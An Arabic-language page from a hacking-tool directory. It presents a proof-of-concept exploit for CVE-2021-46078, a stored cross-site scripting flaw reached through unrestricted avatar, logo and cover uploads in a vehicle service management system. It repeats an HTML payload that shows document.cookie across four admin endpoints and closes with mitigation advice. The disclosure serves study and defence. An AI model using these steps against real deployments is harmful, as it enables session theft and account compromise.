Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting — CVE-2021-46078 - توجد ثغرة رفع ملفات غير مقيّدة (Unrestricted File Upload) في Sourcecodester Vehicle Service Management System الإصدار 1.0. يمكن لمهاجم بعيد رفع ملفات خبيثة تؤدي إلى ثغرة برمجة نصية مخزّنة عبر المواقع (Stored Cross-Site Scripting). | Kitploit
أدوات/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-46078 - توجد ثغرة رفع ملفات غير مقيّدة (Unrestricted File Upload) في Sourcecodester Vehicle Service Management System الإصدار 1.0. يمكن لمهاجم بعيد رفع ملفات خبيثة تؤدي إلى ثغرة برمجة نصية مخزّنة عبر المواقع (Stored Cross-Site Scripting).

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

CVE-2021-46078

عنوان الاستغلال: نظام إدارة خدمات المركبات - 'رفع ملفات متعدد' يؤدي إلى برمجة نصية عبر المواقع المخزنة (Stored Cross-Site Scripting)

مؤلف الاستغلال: SANU P.L

CVE: CVE-2021-46078

CVSS: 4.8 متوسط

المراجع:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46078
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46078

الوصف:

توجد ثغرة رفع ملفات غير مقيد (Unrestricted File Upload) في نظام إدارة خدمات المركبات من Sourcecodester الإصدار 1.0. يمكن لمهاجم عن بُعد رفع ملفات خبيثة تؤدي إلى ثغرة برمجة نصية عبر المواقع المخزنة (Stored Cross-Site Scripting).

1. نظام إدارة خدمات المركبات - 'حسابي' (/admin/?page=user)

الاستغلال:

  1. سجّل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. انتقل إلى قسم حسابي http://localhost/vehicle_service/admin/?page=user

الحمولة (Payload):

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. احفظ كود html أعلاه، على سبيل المثال: XSS.html
  2. في قسم حسابي، أدخل جميع البيانات المطلوبة وتصفح ملف html في حقل الصورة الرمزية (Avatar).
  3. اضغط على زر التحديث.
  4. افتح صورة الصورة الرمزية (Avatar) في تبويب جديد.
  5. يتم تنفيذ كود جافاسكريبت الخبيث.

2. نظام إدارة خدمات المركبات - 'قائمة المستخدمين' (/admin/?page=user/manage_user)

الاستغلال:

  1. سجّل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. انتقل إلى قسم قائمة المستخدمين واضغط على زر إنشاء جديد.

الحمولة (Payload):

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. احفظ كود html أعلاه، على سبيل المثال: XSS.html
  2. في صفحة إنشاء مستخدم جديد، أدخل جميع البيانات المطلوبة وتصفح ملف html في حقل الصورة الرمزية (Avatar).
  3. اضغط على زر الحفظ.
  4. افتح صورة الصورة الرمزية (Avatar) في تبويب جديد.
  5. يتم تنفيذ كود جافاسكريبت الخبيث.

3. نظام إدارة خدمات المركبات - 'الإعدادات - شعار النظام' (/admin/?page=system_info)

الاستغلال:

  1. سجّل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. انتقل إلى قسم الإعدادات http://localhost/vehicle_service/admin/?page=system_info

الحمولة (Payload):

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. احفظ كود html أعلاه، على سبيل المثال: XSS.html
  2. في قسم الإعدادات، أدخل جميع البيانات المطلوبة وتصفح ملف html في حقل شعار النظام (System Logo).
  3. اضغط على زر التحديث.
  4. افتح صورة شعار النظام في تبويب جديد.
  5. يتم تنفيذ كود جافاسكريبت الخبيث.

4. نظام إدارة خدمات المركبات - 'الإعدادات - غلاف الموقع' (/admin/?page=system_info)

الاستغلال:

  1. سجّل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. انتقل إلى قسم الإعدادات http://localhost/vehicle_service/admin/?page=system_info

الحمولة (Payload):

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. احفظ كود html أعلاه، على سبيل المثال: XSS.html
  2. في قسم الإعدادات، أدخل جميع البيانات المطلوبة وتصفح ملف html في حقل غلاف الموقع (Website Cover).
  3. اضغط على زر التحديث.
  4. افتح صورة غلاف الموقع في تبويب جديد.
  5. يتم تنفيذ كود جافاسكريبت الخبيث.

التأثير:

يمكن للمهاجم رفع ملف خبيث في نقاط نهاية متعددة، مما يؤدي إلى برمجة نصية عبر المواقع المخزنة.

التخفيف (Mitigation):

يوصى بتنفيذ ما يلي:

  • لا تقبل أبدًا اسم ملف وامتداده مباشرة دون وجود مرشح قائمة بيضاء.
  • إذا لم تكن هناك حاجة إلى أحرف Unicode، يُوصى بشدة بقبول الأحرف الأبجدية الرقمية فقط ونقطة واحدة فقط كمدخل لاسم الملف والامتداد.
  • حدد حجم الملف إلى قيمة قصوى لمنع هجمات حجب الخدمة (Denial of Service).
  • يجب ألا يحتوي دليل الرفع على أي صلاحية "تنفيذ".
  • لا تعتمد على التحقق من جانب العميل فقط.
تنزيل الأداة